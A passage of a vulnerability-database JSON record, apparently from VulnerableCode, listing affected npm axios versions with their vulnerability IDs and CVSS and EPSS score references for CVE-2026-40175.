o/packages/pkg:npm/axios@1.2.5"},{"url":"http://public2.vulnerablecode.io/api/packages/631922?format=json","purl":"pkg:npm/axios@1.2.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.2.6"},{"url":"http://public2.vulnerablecode.io/api/packages/631923?format=json","purl":"pkg:npm/axios@1.3.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.3.0"},{"url":"http://public2.vulnerablecode.io/api/packages/631924?format=json","purl":"pkg:npm/axios@1.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.3.1"},{"url":"http://public2.vulnerablecode.io/api/packages/146023?format=json","purl":"pkg:npm/axios@1.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.3.2"},{"url":"http://public2.vulnerablecode.io/api/packages/631925?format=json","purl":"pkg:npm/axios@1.3.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.3.3"},{"url":"http://public2.vulnerablecode.io/api/packages/631926?format=json","purl":"pkg:npm/axios@1.3.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.3.4"},{"url":"http://public2.vulnerablecode.io/api/packages/631927?format=json","purl":"pkg:npm/axios@1.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/631928?format=json","purl":"pkg:npm/axios@1.3.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.3.6"},{"url":"http://public2.vulnerablecode.io/api/packages/631929?format=json","purl":"pkg:npm/axios@1.4.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.4.0"},{"url":"http://public2.vulnerablecode.io/api/packages/631930?format=json","purl":"pkg:npm/axios@1.5.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.5.0"},{"url":"http://public2.vulnerablecode.io/api/packages/631931?format=json","purl":"pkg:npm/axios@1.5.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.5.1"},{"url":"http://public2.vulnerablecode.io/api/packages/60987?format=json","purl":"pkg:npm/axios@1.6.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.6.0"},{"url":"http://public2.vulnerablecode.io/api/packages/701506?format=json","purl":"pkg:npm/axios@1.6.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.6.1"},{"url":"http://public2.vulnerablecode.io/api/packages/701507?format=json","purl":"pkg:npm/axios@1.6.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.6.2"},{"url":"http://public2.vulnerablecode.io/api/packages/701508?format=json","purl":"pkg:npm/axios@1.6.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.6.3"},{"url":"http://public2.vulnerablecode.io/api/packages/701509?format=json","purl":"pkg:npm/axios@1.6.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.6.4"},{"url":"http://public2.vulnerablecode.io/api/packages/701510?format=json","purl":"pkg:npm/axios@1.6.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.6.5"},{"url":"http://public2.vulnerablecode.io/api/packages/701511?format=json","purl":"pkg:npm/axios@1.6.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.6.6"},{"url":"http://public2.vulnerablecode.io/api/packages/701512?format=json","purl":"pkg:npm/axios@1.6.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.6.7"},{"url":"http://public2.vulnerablecode.io/api/packages/701513?format=json","purl":"pkg:npm/axios@1.6.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.6.8"},{"url":"http://public2.vulnerablecode.io/api/packages/701514?format=json","purl":"pkg:npm/axios@1.7.0-beta.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.7.0-beta.0"},{"url":"http://public2.vulnerablecode.io/api/packages/701515?format=json","purl":"pkg:npm/axios@1.7.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.7.0-beta.1"},{"url":"http://public2.vulnerablecode.io/api/packages/701516?format=json","purl":"pkg:npm/axios@1.7.0-beta.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.7.0-beta.2"},{"url":"http://public2.vulnerablecode.io/api/packages/701517?format=json","purl":"pkg:npm/axios@1.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.7.0"},{"url":"http://public2.vulnerablecode.io/api/packages/701518?format=json","purl":"pkg:npm/axios@1.7.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.7.1"},{"url":"http://public2.vulnerablecode.io/api/packages/701519?format=json","purl":"pkg:npm/axios@1.7.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.7.2"},{"url":"http://public2.vulnerablecode.io/api/packages/146024?format=json","purl":"pkg:npm/axios@1.7.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.7.3"},{"url":"http://public2.vulnerablecode.io/api/packages/55314?format=json","purl":"pkg:npm/axios@1.7.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.7.4"},{"url":"http://public2.vulnerablecode.io/api/packages/751371?format=json","purl":"pkg:npm/axios@1.7.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.7.5"},{"url":"http://public2.vulnerablecode.io/api/packages/751372?format=json","purl":"pkg:npm/axios@1.7.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.7.6"},{"url":"http://public2.vulnerablecode.io/api/packages/751373?format=json","purl":"pkg:npm/axios@1.7.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.7.7"},{"url":"http://public2.vulnerablecode.io/api/packages/751374?format=json","purl":"pkg:npm/axios@1.7.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.7.8"},{"url":"http://public2.vulnerablecode.io/api/packages/751375?format=json","purl":"pkg:npm/axios@1.7.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.7.9"},{"url":"http://public2.vulnerablecode.io/api/packages/751376?format=json","purl":"pkg:npm/axios@1.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.8.0"},{"url":"http://public2.vulnerablecode.io/api/packages/751377?format=json","purl":"pkg:npm/axios@1.8.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.8.1"},{"url":"http://public2.vulnerablecode.io/api/packages/70089?format=json","purl":"pkg:npm/axios@1.8.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.8.2"},{"url":"http://public2.vulnerablecode.io/api/packages/808090?format=json","purl":"pkg:npm/axios@1.8.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.8.3"},{"url":"http://public2.vulnerablecode.io/api/packages/808091?format=json","purl":"pkg:npm/axios@1.8.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.8.4"},{"url":"http://public2.vulnerablecode.io/api/packages/808092?format=json","purl":"pkg:npm/axios@1.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.9.0"},{"url":"http://public2.vulnerablecode.io/api/packages/70535?format=json","purl":"pkg:npm/axios@1.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-xkyu-r89g-ckec"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.10.0"},{"url":"http://public2.vulnerablecode.io/api/packages/70536?format=json","purl":"pkg:npm/axios@1.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.11.0"},{"url":"http://public2.vulnerablecode.io/api/packages/68901?format=json","purl":"pkg:npm/axios@1.12.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.12.0"},{"url":"http://public2.vulnerablecode.io/api/packages/906408?format=json","purl":"pkg:npm/axios@1.12.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.12.1"},{"url":"http://public2.vulnerablecode.io/api/packages/906409?format=json","purl":"pkg:npm/axios@1.12.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.12.2"},{"url":"http://public2.vulnerablecode.io/api/packages/906410?format=json","purl":"pkg:npm/axios@1.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.13.0"},{"url":"http://public2.vulnerablecode.io/api/packages/906411?format=json","purl":"pkg:npm/axios@1.13.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.13.1"},{"url":"http://public2.vulnerablecode.io/api/packages/906412?format=json","purl":"pkg:npm/axios@1.13.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.13.2"},{"url":"http://public2.vulnerablecode.io/api/packages/906413?format=json","purl":"pkg:npm/axios@1.13.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.13.3"},{"url":"http://public2.vulnerablecode.io/api/packages/147322?format=json","purl":"pkg:npm/axios@1.13.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.13.4"},{"url":"http://public2.vulnerablecode.io/api/packages/62853?format=json","purl":"pkg:npm/axios@1.13.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.13.5"},{"url":"http://public2.vulnerablecode.io/api/packages/1109030?format=json","purl":"pkg:npm/axios@1.13.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.13.6"},{"url":"http://public2.vulnerablecode.io/api/packages/1088747?format=json","purl":"pkg:npm/axios@1.14.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.14.0"}],"references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40175","reference_id":"","reference_type":"","scores":[{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07376","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07432","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07448","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.0722","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.0785","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.07911","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.0817","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.07879","published_at":"2026-04-26T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08708","published_at":"2026-05-14T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08727","published_at":"2026-05-16T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08713","published_at":"2026-05-15T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.13652","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00136","scoring_system":"epss","scoring_elements":"0.33357","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00239","scoring_system":"epss","scoring_elements":"0.46982","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00239","scoring_system":"epss","scoring_elements":"0.46962","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00239","scoring_system":"epss","scoring_elements":"0.46955","published_at":"2026-04-12T12:55:00Z"},{"value":"0.0053","scoring_system":"epss","scoring_elements":"0.67279","published_at":"2026-04-16T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40175"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I